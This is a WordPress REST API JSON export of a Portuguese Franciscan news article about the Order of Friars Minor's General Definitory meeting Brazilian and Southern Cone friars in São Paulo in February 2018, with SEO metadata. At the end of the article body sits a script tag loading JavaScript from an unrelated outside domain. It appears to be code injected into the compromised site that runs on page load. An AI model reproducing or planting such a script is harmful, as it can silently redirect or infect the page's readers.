{"id":150975,"date":"2018-02-08T13:27:52","date_gmt":"2018-02-08T15:27:52","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=150975"},"modified":"2019-01-17T13:36:44","modified_gmt":"2019-01-17T15:36:44","slug":"governo-da-ordem-dos-frades-menores-em-sao-paulo","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html","title":{"rendered":"Ministro Geral celebra segunda em S\u00e3o Paulo"},"content":{"rendered":"<p><strong>Moacir Beggo<\/strong><\/p>\n<p><strong>S\u00e3o Paulo (SP)<\/strong> &#8211; Durante uma semana, de 12 a 17 de fevereiro, o Governo Geral e o Definit\u00f3rio da Ordem dos Frades Menores n\u00e3o ter\u00e3o expediente em Roma. Nesta semana, a C\u00faria Geral se muda para S\u00e3o Paulo com o Encontro do Ministro Geral e seu Conselho com os frades das Confer\u00eancias do Cone Sul (Argentina, Chile e Paraguai) e do Brasil.<\/p>\n<p>Em n\u00edvel mundial, a Ordem se organiza em prov\u00edncias e cust\u00f3dias, cujos ministros formam confer\u00eancias por regi\u00e3o ou por afinidade lingu\u00edstica (de acordo com as Constitui\u00e7\u00f5es da entidade, no Art 227). Entre os objetivos est\u00e3o a colabora\u00e7\u00e3o entre as entidades no campo da forma\u00e7\u00e3o e da evangeliza\u00e7\u00e3o, al\u00e9m da uni\u00e3o entre elas pelo bem comum da Ordem. \u00c9 com estas propostas que desembarcam no hist\u00f3rico Convento S\u00e3o Francisco da Prov\u00edncia da Imaculada Concei\u00e7\u00e3o, no centro de S\u00e3o Paulo, o Ministro Geral Frei Michael Perry, o Vig\u00e1rio Geral Frei Julio C\u00e9sar Bunader e os Definidores: Frei Caoimh\u00edn \u00d3 Laoide (Confer\u00eancia l\u00edngua inglesa), Frei Ignacio Ceja (Confer\u00eancias Guadalupana e Cone Sul), Frei Nicodeme Kibuzehose (Confer\u00eancia Africana); Frei Ivan Sesar (Confer\u00eancias Norte-Slovena e Sul-Slovena); Frei J\u00fcrgen Neitzert (Confer\u00eancia Europa Central), Frei Lino Gregorio Redoblado (Confer\u00eancias Asi\u00e1ticas); Frei Valmir Ramos (Confer\u00eancias Bolivariana e Brasileira) e Frei Antonio Scabio (Confer\u00eancias da It\u00e1lia e Pen\u00ednsula Ib\u00e9rica).<\/p>\n<p><img loading=\"lazy\" class=\"alignleft wp-image-151342\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/02\/Ministro_Geral110218_lado.jpg\" alt=\"Ministro_Geral110218_lado\" width=\"304\" height=\"460\" \/>&#8220;Estando no Brasil, o Definit\u00f3rio Geral, que tem a miss\u00e3o de animar a Ordem inteira, ter\u00e1 a oportunidade de vivenciar um pouco a eclesiologia e o franciscanismo inseridos numa realidade muito pr\u00f3xima da vida do povo. A Confer\u00eancia Brasileira j\u00e1 deu passos muito importantes de colabora\u00e7\u00e3o, seja no campo da forma\u00e7\u00e3o ou da evangeliza\u00e7\u00e3o. Normalmente, o relacionamento dos ministros \u00e9 muito fraterno, sincero, aberto \u00e0 colabora\u00e7\u00e3o. Isto cria um ambiente muito favor\u00e1vel para unir as for\u00e7as num Brasil t\u00e3o grande e com tanta diversidade&#8221;, acredita o brasileiro Frei Valmir Ramos, destacando a presen\u00e7a sempre muito atuante dos franciscanos no Brasil e o que podem oferecer para toda a Ordem.<\/p>\n<p>O \u00faltimo encontro do Ministro e seu Definit\u00f3rio no Brasil foi em Manaus, em 2011, quando era Ministro Geral Frei Jos\u00e9 Rodriguez Carballo. &#8220;Ao menos uma vez a cada 6 anos as Confer\u00eancias devem reunir-se com o Definit\u00f3rio Geral tendo a finalidade de: comunicar as quest\u00f5es mais importantes, tratar assuntos relacionados \u00e0 vida da OFM naquela regi\u00e3o; propor assuntos de interesse comum para o Cap\u00edtulo Geral. Estes encontros permitem ao Definit\u00f3rio Geral conhecer melhor a Ordem espalhada pelo mundo&#8221;, detalhou Frei Valmir, que adiantou que na programa\u00e7\u00e3o os frades visitar\u00e3o as obras sociais do Servi\u00e7o Franciscano de Solidariedade em S\u00e3o Paulo, onde h\u00e1 projetos que atendem a popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua, popula\u00e7\u00e3o que vive e convive com doen\u00e7as sexualmente transmiss\u00edveis, servi\u00e7o de reciclagem, adolescentes em cumprimento de medida socioeducativa, terceira idade, crian\u00e7as e idosos. Na sexta-feira, os frades conhecer\u00e3o o Santu\u00e1rio da Padroeira do Brasil em Aparecida e a cidade de Guaratinguet\u00e1, onde nasceu o primeiro santo brasileiro: o franciscano Frei Galv\u00e3o.<\/p>\n<p>Segundo Frei Valmir, o encontro com as Confer\u00eancias tem o objetivo tamb\u00e9m de conhecer as v\u00e1rias realidades em que os frades vivem e atuam. &#8220;Sair de Roma significa investir neste conhecimento para ampliar a vis\u00e3o sobre a realidade da Ordem no mundo&#8221;, explica.<\/p>\n<p>Para Frei Valmir, as &#8220;Diretrizes de anima\u00e7\u00e3o do Definit\u00f3rio Geral para os anos 2018 e 2019&#8221; orientam a Ordem nos seus v\u00e1rios encontros, mas a metodologia do Ministro Geral Frei Michael \u00e9 inicialmente ouvir. Nos dois primeiros dias, os Ministros Provinciais apresentar\u00e3o as v\u00e1rias situa\u00e7\u00f5es das Confer\u00eancias e das entidades. &#8220;Depois, Frei Michael faz uma palestra levando-se em conta o que viu e ouviu com linhas orientativas para a anima\u00e7\u00e3o da vida e miss\u00e3o dos frades nestas Confer\u00eancias. Ele tamb\u00e9m vai colocar o panorama atual da OFM no mundo e as iniciativas mais importantes, sejam para sanar dificuldades, sejam para dar passos de crescimento como Ordem e como Fam\u00edlia Franciscana&#8221;, adianta o Definidor brasileiro.<\/p>\n<p>O Ministro Geral, Frei Michael Perry, preside a Celebra\u00e7\u00e3o Eucar\u00edstica \u00e0s 7h30 no dia 12 (segunda-feira), na Igreja do Convento S\u00e3o Francisco. O Ministro Provincial anfitri\u00e3o, Frei Fid\u00eancio Vanboemmel, abre o evento e, em seguida, ser\u00e1 feita a apresenta\u00e7\u00e3o de cada entidade. Frei Michael encerra o evento no dia 16, s\u00e1bado, com a Celebra\u00e7\u00e3o Eucar\u00edstica, tamb\u00e9m na Igreja do Convento.<\/p>\n<p>O Ministro Geral j\u00e1 est\u00e1 em S\u00e3o Paulo e, neste domingo, concelebrou a Santa Missa das 10h30, presidida por Frei Gustavo Medella, que apresentou Frei Michael aos fi\u00e9is. No final da Celebra\u00e7\u00e3o, ele\u00a0aben\u00e7oou os fi\u00e9is com a\u00a0B\u00ean\u00e7\u00e3o de S\u00e3o Francisco.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/02\/Ministro_Geral110218_meio.jpg\" alt=\"Ministro_Geral110218_meio\" width=\"830\" height=\"450\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ministro Geral no Encontro do Definit\u00f3rio Geral com os Ministros e Cust\u00f3dios da CFMB e do Cone Sul.<\/p>\n","protected":false},"author":1,"featured_media":194897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[184,128],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Ministro Geral no Encontro do Definit\u00f3rio Geral com os Ministros e Cust\u00f3dios da CFMB e do Cone Sul.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-02-08T15:27:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-01-17T15:36:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html\",\"name\":\"Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#primaryimage\"},\"datePublished\":\"2018-02-08T15:27:52+00:00\",\"dateModified\":\"2019-01-17T15:36:44+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ministro Geral celebra segunda em S\u00e3o Paulo\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html","og_locale":"pt_BR","og_type":"article","og_title":"Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos","og_description":"Ministro Geral no Encontro do Definit\u00f3rio Geral com os Ministros e Cust\u00f3dios da CFMB e do Cone Sul.","og_url":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-02-08T15:27:52+00:00","article_modified_time":"2019-01-17T15:36:44+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/02\/geral_170119.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html","name":"Ministro Geral celebra segunda em S\u00e3o Paulo - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#primaryimage"},"datePublished":"2018-02-08T15:27:52+00:00","dateModified":"2019-01-17T15:36:44+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/governo-da-ordem-dos-frades-menores-em-sao-paulo.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Ministro Geral celebra segunda em S\u00e3o Paulo"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/150975"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=150975"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/150975\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/194897"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=150975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=150975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=150975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}